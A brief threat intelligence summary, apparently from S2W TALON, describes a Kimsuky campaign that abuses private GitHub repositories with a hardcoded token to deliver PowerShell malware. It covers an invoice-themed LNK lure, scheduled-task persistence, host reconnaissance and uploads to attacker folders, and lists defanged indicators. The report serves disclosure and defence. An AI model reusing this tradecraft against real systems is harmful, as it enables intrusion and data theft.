S2W TALON identified ongoing Kimsuky activity abusing private GitHub repositories to deliver and manage PowerShell malware. The infection begins with a ZIP containing an LNK file disguised as an electronic tax invoice, which launches PowerShell to download a decoy document and additional scripts from hxxps://github[.]com/God0808RAMA/group_0721/ using a hardcoded GitHub private token. The scripts create persistence through MicrosoftEdgeUpdate.ps1 and a scheduled task named BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}, then repeatedly fetch and execute updated payloads. The first-stage script collects IP address, system and OS details, install date, running processes, and boot-time information before uploading logs into attacker-controlled GitHub folders such as ntxBill_{MMdd_HHmm}. Repository analysis exposed nine related private repositories and the email sahiwalsuzuki4[@]gmail.com, underscoring Kimsuky’s continued use of trusted developer infrastructure for malware delivery and exfiltration.